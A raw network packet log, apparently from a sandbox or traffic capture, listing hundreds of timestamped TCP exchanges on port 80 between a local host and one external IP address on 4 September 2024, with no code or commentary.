Sep 4, 2024 17:37:07.470792055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470807076 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470807076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470819950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470824957 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470832109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.470849037 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.470873117 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.471379995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.471390963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.471400976 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.471410990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.471421957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.471429110 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.471436024 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.471465111 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.471477032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539191961 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539227962 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539242029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539247990 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539263964 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539283037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539391994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539405107 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539441109 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539504051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539514065 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539524078 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539546013 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539560080 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539654970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539668083 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539678097 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539690018 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539700031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539702892 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539715052 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539725065 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539742947 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539763927 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.539944887 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539958000 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539968014 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539979935 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539990902 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.539992094 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540002108 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540013075 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540024996 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540028095 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540038109 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540046930 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540052891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540059090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540069103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540069103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540085077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540096045 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540098906 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540110111 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540127993 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540605068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540616989 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540627956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540638924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540653944 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540656090 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540666103 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540667057 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540689945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540710926 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540813923 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540860891 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540863037 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540904045 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.540935993 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540949106 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540957928 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540968895 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.540983915 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541007996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541203976 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541215897 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541225910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541234016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541244984 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541251898 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541255951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541263103 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541266918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541280031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541286945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541290998 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541313887 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541330099 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541480064 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541491032 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541546106 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541563034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541573048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541599035 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541652918 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541662931 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541671991 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541682959 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541693926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541701078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541708946 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541738033 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541822910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541835070 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541863918 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541876078 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.541975021 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541985035 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.541995049 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.542006016 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.542016029 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.542017937 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.542028904 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.542037010 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.542040110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.542052031 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.542058945 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.542083025 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.543245077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.543292046 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.543318987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.543330908 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.543361902 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.543366909 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.543378115 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.543402910 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.543423891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.543426037 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.543461084 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.543742895 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.548512936 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.553961039 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.553972006 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.553982019 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554008007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554022074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554022074 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554033995 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554044962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554059982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554086924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554164886 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554178953 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554222107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554311991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554323912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554358006 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554378033 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554389954 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554403067 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554413080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554425955 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554438114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554449081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554478884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554490089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554497957 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554518938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554532051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554645061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554655075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554666042 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554708958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554733038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554765940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554778099 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554788113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554800987 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554804087 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554811954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554836035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554954052 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.554994106 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.554999113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555011988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555035114 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555054903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555131912 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555144072 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555152893 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555162907 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555166960 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555177927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555182934 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555203915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555227995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555313110 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555325031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555335045 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555346012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555351973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555367947 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555402994 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555537939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555548906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555557966 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555569887 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555582047 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555613041 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555654049 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555700064 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555752993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555766106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555775881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555788040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555794954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555799007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555809975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.555810928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555838108 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.555847883 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557393074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557435036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557447910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557460070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557487965 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557612896 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557625055 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557635069 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557647943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557658911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557670116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557698011 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557754993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557768106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557776928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557790041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557801008 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557801008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.557821035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557833910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.557993889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558003902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558012962 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558043003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558057070 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558139086 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558151007 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558157921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558166981 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558176041 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558185101 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558185101 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558196068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558204889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558207035 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558216095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558223963 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558243036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558258057 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558540106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558549881 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558559895 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558569908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558578968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558578968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558579922 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558593035 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558602095 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558628082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558809996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558820963 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558828115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558837891 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558846951 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558856010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558867931 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558882952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558911085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558926105 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558934927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558945894 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558955908 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558959007 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558967113 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558976889 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.558984995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.558988094 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559000015 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559005022 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559022903 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559036016 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559583902 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559606075 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559616089 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559626102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559628010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559638023 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559647083 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559649944 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559659958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559669971 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559675932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559679985 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559695959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559700966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559705973 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559715986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559716940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559731960 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559741974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559742928 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559752941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559762955 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559763908 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559777021 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559786081 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559788942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559799910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559809923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559819937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.559823036 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559845924 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.559859991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.560450077 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560462952 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560472012 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560493946 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560504913 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560509920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.560509920 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.560518026 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560528994 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:07.560538054 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:07.560545921 CEST	80	49719	147.45.44.104	192.168.2.6
